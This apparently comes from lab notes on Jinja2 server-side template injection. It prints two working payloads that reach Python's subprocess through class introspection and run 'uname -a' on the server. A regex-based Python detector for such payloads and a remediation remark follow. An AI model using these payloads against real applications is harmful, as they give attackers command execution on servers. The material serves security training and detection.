9.6.2

R3zk0n · October 2, 2025

    Using the Python and Jinja documentation, make changes to the template that will allow the output to display in the response.

    {# From https://gist.github.com/mgeeky/fd994a067e3407fd87e8c224e65df8d8 #}
    {{''.__class__.__mro__[2].__subclasses__()[233]('uname -a',shell=True,stdout=-1).communicate()[0].strip()}}
    
    {% set string = "ssti" %}
    {% set class = "__class__" %}
    {% set mro = "__mro__" %}
    {% set subclasses = "__subclasses__" %}
    
    {% set mro_r = string|attr(class)|attr(mro) %}
    {% set subclasses_r = mro_r[1]|attr(subclasses)() %}
    {# Use stdout=-1 (the value of subprocess.PIPE) to dump all contents to the response #}
    {{ subclasses_r[1153](['uname', '-a'], stdout=-1).communicate()}}
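
A defender-side view of the two template styles above, as an added example that is not part of the original notes: a heuristic that flags Jinja2 introspection in request values, covering both the dotted form and the `{% set %}` plus `attr()` form. The function names and sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Jinja2 expression and statement delimiters: {{ ... }} and {% ... %}
TEMPLATE_BLOCK = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Any double-underscore name, written as .__class__ or as the string "__class__"
DUNDER = re.compile(r"__[A-Za-z]+__")
# The attr filter resolves an attribute from a string or variable, not dotted syntax
ATTR_FILTER = re.compile(r"\|\s*attr\s*\(")

def inspect_value(raw):
    """Return the reasons a request value looks like Jinja2 introspection."""
    value = unquote_plus(raw)              # decode %7B%7B etc. before matching
    blocks = " ".join(TEMPLATE_BLOCK.findall(value))
    reasons = []
    if not blocks:
        return reasons                     # no template syntax at all
    names = sorted(set(DUNDER.findall(blocks)))
    if names:
        reasons.append("dunder names: " + ", ".join(names))
    if ATTR_FILTER.search(blocks):
        reasons.append("attr() filter lookup")
    return reasons

# Constructed sample parameter values (not captured traffic)
SAMPLES = {
    "benign": "Hello {{ user.name }}, your order __is__ ready",
    "dotted": "{{ ''.__class__.__mro__ }}",
    "indirect": '{% set class = "__class__" %}{{ string|attr(class) }}',
    "encoded": "%7B%7B%20''.__class__%20%7D%7D",
}

def scan(samples):
    """Map each sample name to its reasons, keeping only flagged entries."""
    return {name: r for name, value in samples.items() if (r := inspect_value(value))}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", "; ".join(reasons))
```

A hit is a triage signal for logs or a WAF rule; the durable fix is to pass user input to the template as data and never render it as template source.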
    
